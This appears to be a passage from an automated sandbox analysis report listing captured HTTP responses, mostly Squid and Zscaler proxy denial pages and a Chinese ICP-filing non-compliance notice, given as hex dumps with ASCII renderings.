                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:45 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:46 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.14Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:42 GMTContent-Type: text/html;charset=utf-8Content-Length: 3846X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 31 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:47 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 